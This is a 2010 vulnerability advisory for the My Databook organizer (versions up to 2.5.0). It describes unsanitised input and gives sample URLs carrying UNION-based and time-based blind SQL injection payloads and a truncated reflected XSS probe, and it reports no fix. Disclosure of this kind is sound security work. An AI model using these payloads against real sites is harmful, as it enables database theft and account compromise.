My Databook <= 2.5.0 Multiple Remote Vulnerabilities Name My Databook Vendor http://www.mealex.com Versions Affected <= 2.5.0 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-06-30 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION My DataBook is a personal organizer/planner. Features include eMail reminders, calendar, journal, appointments, and contacts. II. DESCRIPTION All input fields in all scripts are not properly sanitised before being used in any context. III. ANALYSIS Summary: A) Multiple SQL Injection B) Multiple Blind SQL Injection C) Reflected XSS A) Multiple SQL Injection All input fields are not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. B) Multiple Blind SQL Injection All input fields are not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation requires that "magic_quotes_gpc" is disabled. B) Reflected XSS Many input fields are printed without check the presence of html/javascript tags. This behavior allows an user to inject html code. IV. SAMPLE CODE A) Multiple SQL Injection http://site/path/print.php?Sec=contacts&ID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 http://site/path/edit_contact.php?Sec=contacts&ID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 B) Multiple Blind SQL Injection http://site/path/edit_contact.php?Sec=contacts&ID=-1' OR IF(ASCII((SELECT CHAR(90))) = 90, BENCHMARK(10000000, MD5(0x90)), NULL)%23&Mod=Y C) Reflected XSS http://site/path/edit_contact.php?Sec=contacts&ID=1"> V. FIX No Fix.